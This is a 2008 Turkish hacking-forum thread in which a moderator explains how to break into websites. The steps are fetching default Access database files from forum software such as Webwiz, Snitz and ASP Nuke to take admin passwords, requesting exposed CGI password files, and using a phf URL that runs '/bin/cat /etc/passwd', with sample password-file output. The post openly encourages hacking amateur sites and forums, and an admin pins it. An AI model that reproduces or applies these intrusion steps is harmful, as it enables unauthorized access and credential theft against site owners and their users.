|~Pc kopat 2oo8~|| HACKİNG ,SECURİTY,PROGRAMLAMA,PROGRAM,İNTERNET ERİŞiMİ ,PAYLAŞIM PORTALI

BİLGİSAYAR, WEB PROGRAMLAMA,İNTERNET ERİŞİMİ, PROGRAMLAMA VE PC BAKIM, DONANIM, PC GÜVENLİK SUNUCU YOLU
 
AnasayfaSSSAramaÜye ListesiKullanıcı GruplarıKayıt OlGiriş yap

Paylaş | 
 

 Web Güvenlik Açıkları((asp,,cgi,phf vs.vs.vs)

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
*****GAMEOVER*****
MODERATÖR
MODERATÖR
avatar

Erkek
Mesaj Sayısı : 120
Nerden : KonYA
Lakap : OYUN KOPAT-ÇÖPÇATANCI-MATEMATİKCİ-MATEMATİK MANYAĞI xD xD
RUH HALİ :
SADECE BU KONUDA AŞAĞIDAKİ KADAR TEŞEKKÜR EDİLDİ : <div class="js-kit-rating" view="score"path="" title="" permalink=""></div><script src="http://js-kit.com/ratings.js"></script>
TAKIM :
Kayıt tarihi : 13/08/08

MesajKonu: Web Güvenlik Açıkları((asp,,cgi,phf vs.vs.vs)   C.tesi Eyl. 06, 2008 3:36 pm

_____GUVENLIK ACIKLARI:_____

Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
www.forumunadresi.com/admin/wwwforum.mdb olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
www.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
www.siteadresi.com/db/main.mdb den database’e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar

/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi

Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari

.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t’s CGI scanner’dır.


Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da color=#0000ffhttp://www.hedefsite.com/cgi-bin/webBBS/users/

Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt

WWWBoard Scriptleri:
Açık : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açık : color=#0000ffhttp://www.hedefsite.com/webboard/password.txt

Biraz da phfden bahsetmek istiyorum:
96’da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
color=#0000ffhttp://KIRACAGIMIZADRES/cgi-bin/phf...0a/bin/cat%20/e tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
__________________

_________________




*****GAMEOVER*****
GAME OVER BÖLÜMÜ MODERATÖRÜ
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
XabrkX
Admin
Admin
avatar

Erkek
Mesaj Sayısı : 573
Nerden : NOLDU BİZEMİ GELCEN ? :D :D
Lakap : ******kaRİZma*******
RUH HALİ :
SADECE BU KONUDA AŞAĞIDAKİ KADAR TEŞEKKÜR EDİLDİ : <div class="js-kit-rating" view="score"path="" title="" permalink=""></div><script src="http://js-kit.com/ratings.js"></script>
TAKIM :
Kayıt tarihi : 09/07/08

MesajKonu: Geri: Web Güvenlik Açıkları((asp,,cgi,phf vs.vs.vs)   C.tesi Eyl. 06, 2008 3:38 pm

saĞOll konu sabitlenmiştir....

_________________




*****Gec€LerİN ADmiNİ*****
XabrkX
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.pckopat.forumn.biz
 
Web Güvenlik Açıkları((asp,,cgi,phf vs.vs.vs)
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» HANGİ HASTALIĞA HANGİ YİYECEK 2
» Sistem Açıkları ve Kapatmak
» vBulletin Güvenlik Önlemleri 3

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
|~Pc kopat 2oo8~|| HACKİNG ,SECURİTY,PROGRAMLAMA,PROGRAM,İNTERNET ERİŞiMİ ,PAYLAŞIM PORTALI :: WEB HACKİNG :: web -domain hacking-
Buraya geçin: